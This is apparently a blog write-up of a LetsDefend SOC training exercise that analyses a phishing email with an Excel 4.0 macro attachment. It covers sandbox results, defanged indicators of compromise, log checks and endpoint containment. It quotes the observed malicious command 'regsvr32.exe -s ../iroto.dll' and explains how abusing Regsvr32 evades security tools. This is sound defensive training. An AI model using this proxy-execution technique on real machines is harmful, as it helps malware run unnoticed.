Lets Defend — Phishing Mail Detected

SOC146 — Phishing Mail Detected — Excel 4.0 Macros

LetsDefend
LetsDefend is a platform for practical training for blue team members. You can improve your skills in log analysis, incident handling, malware analysis and endpoint analysis.

SOC146 — Phishing Mail Detected — Excel 4.0 Macros

Today we will analyze a real phishing scenario. Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers. The recipient is tricked into clicking a malicious link, or downloading a malicious attachment, which can lead to the installation of malware.

Monitoring

Our investigation start at the Monitoring page which simulates a real working SOC environment. More details about the incident can be found here. Looking at the details, we can see the source address, SMTP address and more. Our next step is to copy the sender address and look for it in our mailbox.

Monitoring Window

Mailbox

By searching for the source address in the mailbox, we find the copy of the email that generated the alert.

Copy of the malicious email

We can extract important information found in the email, that could be useful in the future :

  • Subject: RE: Meeting Notes
  • Sender: trenton@tritowncomputers[.]com
  • Recipient(s): lars@letsdefend[.]com
  • Attachment(s): 11f44531fb088d31307d87b01e8eabff.zip

Next, we will download the attachment and unzip it in a safe environment. In our case, we are using REMnux (https://remnux.org/).

After unzipping the attachment, we found three files:

Generating MD5

By using md5sum, a tool built-in in REMnux, we are calculating the hash of the files in the attachment. Hashes are useful for positively identifying a malware. The malicious software is run through a hashing program that produces a unique hash that identifies that malware (a sort of fingerprint).

Virus Total

Next, we perform a hash search on VirusTotal (VT). VT allows you to search through their dataset in order to identify files that match certain criteria. To search for a file that has a given MD5, just type in the hash under consideration in the main search box.

Virus Total Result Window

According to VT, the three files are flagged malicious. At the time of our scan, the result reports 30 antivirus engines claiming the excel file has malicious. And 8 different antivirus engines claiming the DLL is malicious.

Anyrun Sandbox

Anyrun is an interactive malware analysis sandbox. The service detects, analyzes, and monitors cybersecurity threats in a given file, URL or executable. It shows all processes in real-time and an analyst can notice all malicious operations before the final version of the report.

Below, the results of analysis of our malicious excel file.

Anyrun Task Window

The sandbox detected unusual executions. The malware abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including DLLs, on Windows systems.

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations.

The sandbox also detected malicious network traffic transmitted across the network. The malicious excel is trying to communicate with two IPs known to be malicious.

Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. In our case, the communication is using application layer protocol associated with web traffic (Port 443). Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client (victim) and server (attacker).

IoCs

  • 188[.]213[.]19[.]81
  • 192[.]232[.]219[.]67
  • nws[.]visionconsulting[.]ro
  • royalpalm[.]sparkblue[.]lk
  • trenton@tritowncomputers[.]com
  • b775cd8be83696ca37b2fe00bcb40574
  • e03bde4862d4d93ac2ceed85abf50b18
  • 8e6fbefcbac2a1967941fa692c82c3ca

Log Management

We will now use the Log Management page and check if the C2s addresses were accessed. We have a result for the first IP 188[.]213[.]19[.]81. It was accessed by the host 172[.]16[.]17[.]57.

Log Management Window

By clicking on the magnifying glass, we can see further details about the raw data. The malicious domain was reached by the user and the action was allowed based on the output.

Raw Log Window

The same process was repeated for the second IP 192[.]232[.]219[.]67 and we can see a log entry.

Log Management Window

Further details on raw data gived the conclusion that the second malicious domain was also reached by the user and the action was allowed based on the output.

Raw Log Window

Endpoint Management

Since the malicious IoCs (IPs and domains) were reached by the device 172[.]16[.]17[.]57 our next step will be to contain the machine so no further exploit can occur.

Going to the Endpoint Security (EDR) page, we can contain the user machine.

Endpoint Security Window

Looking at more details given by the EDR, we have the option to dig deeper by looking at the command history, network connections and process list.

In the command history, we can see that the command “regsvr32.exe -s ../iroto.dll” was executed on the endpoint.

Command History Window

Network connections showcased once again that the malicious IPs were communicating with the endpoint.

Network Connections Window

And finally, the process history tree demonstrated that the process “regsvr32.exe” was run by the parent process “excel.exe” and had a command line of : “regsvr32.exe -s iroto.dll”.

Process History Window

Case Management Detail

We now are packed with enough information to conclude that the alert is a true positive and that a incident should be open.

We can answer the questions of the playbook with the information we’ve collected during our analysis.

Case Management Window

Playbook

A security playbook is a list of required steps and actions needed to successfully respond to any incident or threat. Playbooks provide a step-by-step approach to orchestration, helping security teams to establish standardized incident response processes and ensuring the steps are followed in compliance with regulatory frameworks.

Playbook Window
  • When was it sent?
    June 13, 2021 2:11 P.M
  • What is the email’s SMTP address?
    24.213.228.54
  • What is the sender address?
    trenton@tritowncomputers[.]com
  • What is the recipient address?
    lars@letsdefend.io
  • Is the mail content suspicious?
    Yes.
  • Are there any attachment?
    Yes.

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store